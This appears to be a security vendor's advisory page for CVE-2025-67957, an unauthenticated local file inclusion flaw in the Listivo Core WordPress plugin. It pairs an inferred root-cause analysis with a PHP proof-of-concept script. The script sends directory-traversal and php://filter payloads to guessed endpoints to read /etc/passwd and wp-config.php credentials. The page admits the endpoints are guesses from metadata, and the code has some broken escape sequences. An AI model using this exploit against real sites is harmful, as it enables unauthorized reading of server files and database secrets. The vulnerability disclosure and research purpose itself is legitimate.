Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-67957: Listivo Core <= 2.3.77 – Unauthenticated Local File Inclusion (listivo-core)

CVE ID CVE-2025-67957
Plugin listivo-core
Severity High (CVSS 8.1)
CWE 98
Vulnerable Version 2.3.77
Patched Version
Disclosed January 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67957 (metadata-based):
This vulnerability is an unauthenticated Local File Inclusion (LFI) in the Listivo Core WordPress plugin, affecting versions up to and including 2.3.77. The flaw allows attackers to include arbitrary files from the server’s filesystem, potentially leading to remote code execution. The CVSS score of 8.1 indicates a high-severity risk.

Atomic Edge research infers the root cause is improper validation of user-controlled input used in PHP file inclusion functions like `include()` or `require()`. The CWE-98 classification confirms this pattern. The vulnerability likely exists in a plugin endpoint that accepts a file path parameter without proper sanitization. This conclusion is inferred from the CWE and description, as the source code diff is unavailable for confirmation.

Exploitation likely involves sending a crafted HTTP request to a specific plugin endpoint. Attackers can target AJAX handlers (`admin-ajax.php`) or direct plugin files. A payload would manipulate a parameter, such as `file` or `template`, to traverse directories and include local files like `/etc/passwd` or previously uploaded web shells. The unauthenticated nature suggests missing capability checks on the vulnerable function.

The patch in version 2.3.78 likely implemented strict validation on the user-supplied filename parameter. Proper remediation requires using an allowlist of permitted files, sanitizing input with `sanitize_file_name()`, or removing directory traversal sequences. The fix should also ensure the endpoint verifies user capabilities or a valid nonce.

Successful exploitation grants attackers the ability to execute arbitrary PHP code on the server. This leads to full system compromise, sensitive data exposure, and complete site takeover. Attackers can bypass access controls, establish persistent backdoors, and pivot to other services on the host network.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-67957 - Listivo Core <= 2.3.77 - Unauthenticated Local File Inclusion
<?php
/**
 * Proof of Concept for CVE-2025-67957.
 * This script attempts to exploit an unauthenticated Local File Inclusion (LFI) vulnerability.
 * The exact endpoint and parameter are inferred from common WordPress plugin patterns.
 * Two common attack vectors are tested: a direct plugin file and an AJAX handler.
 */

$target_url = 'http://target-site.com'; // CHANGE THIS

// Common LFI payloads to test for file inclusion
$payloads = [
    '../../../../../../etc/passwd',
    '..\..\..\..\..\..\windows\win.ini',
    'php://filter/convert.base64-encode/resource=wp-config.php',
];

// Inferred vulnerable endpoints based on plugin slug 'listivo-core'
$endpoints = [
    '/wp-content/plugins/listivo-core/includes/templates/loader.php', // Common direct file pattern
    '/wp-admin/admin-ajax.php', // AJAX handler
];

// Inferred parameter names common in LFI vulnerabilities
$params = ['file', 'template', 'path', 'include', 'load'];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

foreach ($endpoints as $endpoint) {
    foreach ($params as $param) {
        foreach ($payloads as $payload) {
            $url = $target_url . $endpoint;
            $data = [$param => $payload];

            // Test via POST (common for AJAX)
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            $response = curl_exec($ch);

            // Check for indicators of successful LFI
            if (strpos($response, 'root:') !== false || strpos($response, '; for 16-bit app support') !== false || (base64_decode(trim($response)) !== false && strpos(base64_decode(trim($response)), 'DB_NAME') !== false)) {
                echo "[SUCCESS] Potential LFI at: $urln";
                echo "Parameter: $paramn";
                echo "Payload: $payloadn";
                echo "Response snippet: " . substr($response, 0, 200) . "nn";
                exit;
            }

            // Test via GET for direct file endpoints
            if ($endpoint !== '/wp-admin/admin-ajax.php') {
                $url_with_query = $url . '?' . http_build_query($data);
                curl_setopt($ch, CURLOPT_URL, $url_with_query);
                curl_setopt($ch, CURLOPT_POST, false);
                $response = curl_exec($ch);
                if (strpos($response, 'root:') !== false || strpos($response, '; for 16-bit app support') !== false || (base64_decode(trim($response)) !== false && strpos(base64_decode(trim($response)), 'DB_NAME') !== false)) {
                    echo "[SUCCESS] Potential LFI at: $url_with_queryn";
                    echo "Parameter: $paramn";
                    echo "Payload: $payloadn";
                    echo "Response snippet: " . substr($response, 0, 200) . "nn";
                    exit;
                }
            }
        }
    }
}

echo "[INFO] No obvious LFI vulnerability detected with inferred patterns.n";
curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School